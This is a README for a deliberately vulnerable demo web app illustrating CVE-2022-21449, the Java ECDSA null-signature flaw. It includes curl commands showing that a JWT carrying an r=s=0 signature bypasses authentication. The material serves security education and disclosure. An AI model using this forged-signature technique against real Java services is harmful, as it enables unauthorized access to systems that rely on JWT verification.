jwt-null-signature-vulnerable-app

Exploitation and Sample Vulnerable Application of the JWT Null Signature Vulnerability (CVE-2022-21449)

This folder contains a sample web application vulnerable to CVE-2022-21449, a vulnerability in the Java JDKs 15 to 18 allowing to bypass signature checks using ECDSA signatures (based on elliptic curves).

Running the application

Run it:

docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/datadog/jwt-null-signature-vulnerable-app

Built it yourself:

docker build . -t vulnerable-app
docker run -p 8080:8080 --name vulnerable-app --rm vulnerable-app

Exploitation steps

The application has a single endpoint that requires authenticating with a valid JWT (with regard to a randomly-generated private key):

$ curl localhost:8080 -sSL -D-
HTTP/1.1 401
Content-Type: text/plain;charset=UTF-8
Content-Length: 46
Date: Wed, 20 Apr 2022 14:53:06 GMT

You are not authorized to access this endpoint

Specifying an invalid JWT (for instance, signed with any EC256 key) returns an error as well:

# Generated on https://token.dev/ with the algorithm "ES256"
$ JWT=eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJSaWNrIEFzdGxleSIsImFkbWluIjp0cnVlLCJpYXQiOjE2NTA0NjY1MDIsImV4cCI6MTkwMDQ3MDEwMn0.R05LldFQf7kay5-8hPeJYnYD_ehxKAKFXo-t6Qt7ZKUKkQSQowOHeiZBI9ierO1q6AZlJ4GsXFsxhPrj6m4cMg
$ curl localhost:8080 -sSL -D- -H "Authorization: Bearer $JWT"
HTTP/1.1 401
Content-Type: text/plain;charset=UTF-8
Content-Length: 11
Date: Wed, 20 Apr 2022 14:56:04 GMT

Invalid JWT

However, specifying an ECDSA signature with r=s=0 encoded in DER, MAYCAQACAQA=, allows us to bypass the JWT verification check!

$ echo -ne "MAYCAQACAQA=" | base64 -d | openssl asn1parse -inform der
0:d=0  hl=2 l=   6 cons: SEQUENCE
2:d=1  hl=2 l=   1 prim: INTEGER           :00
5:d=1  hl=2 l=   1 prim: INTEGER           :00

# Same JWT as above with the malicious signature
$ JWT=eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJSaWNrIEFzdGxleSIsImFkbWluIjp0cnVlLCJpYXQiOjE2NTA0NjY1MDIsImV4cCI6MTkwMDQ3MDEwMn0.MAYCAQACAQA
$ curl localhost:8080 -sSL -D- -H "Authorization: Bearer $JWT"
HTTP/1.1 200
Content-Type: text/plain;charset=UTF-8
Content-Length: 19
Date: Wed, 20 Apr 2022 14:59:18 GMT

Hello, Rick Astley!

Notes

This demo makes of use of the popular jjwt library. Similar vulnerabilities are likely to affect other Java-based JWT libraries running on vulnerable JDK versions - the vulnerability does not lie in the libraries themselves, but in the cryptographical primitives provided by the vulnerable JDK.

Credits

• Disclosure: https://neilmadden.blog/2022/04/19/psychic-signatures-in-java/ by Neil Madden
• This repository: Thomas Etrillard, Christophe Tafani-Dereeper